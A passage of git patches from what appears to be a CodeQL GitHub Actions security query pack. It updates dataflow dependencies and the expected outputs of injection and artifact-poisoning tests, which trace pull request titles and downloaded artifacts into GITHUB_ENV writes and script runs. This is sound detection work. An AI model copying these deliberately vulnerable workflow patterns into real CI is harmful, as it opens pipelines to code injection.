.github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | +| .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | provenance | | +| .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | provenance | | +| .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | provenance | | +| .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | provenance | | nodes | .github/workflows/test2.yml:12:9:41:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | semmle.label | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index f7b4ae7bc117..fdb5beb09aa0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,84 +1,84 @@ edges -| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | -| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | -| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | -| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected index 193eee3b66cc..a18aa5bdc80e 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected @@ -1,17 +1,17 @@ edges -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From ba4dd2b0edfb0493d3e282e4195aba735e4d20a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 321/707] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/src/codeql-pack.lock.yml | 12 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 26 files changed, 316 insertions(+), 292 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf459..feafe4f68bb0 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa88..8203a54dfebd 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef65..2e3c13f164c2 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd539279..17b29f57025c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() @@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db916..96568f86db33 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20f..2fd062e76607 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b4..b8647339d24c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c126..000000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a60..48045dbf6792 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26dc..4b8239b7f6ca 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac3175..0a5bfe433e91 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b1910682..87c185fb5e12 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef6..067edb68bb1c 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416d..f2178960774e 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9faa..c76034f74d46 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| 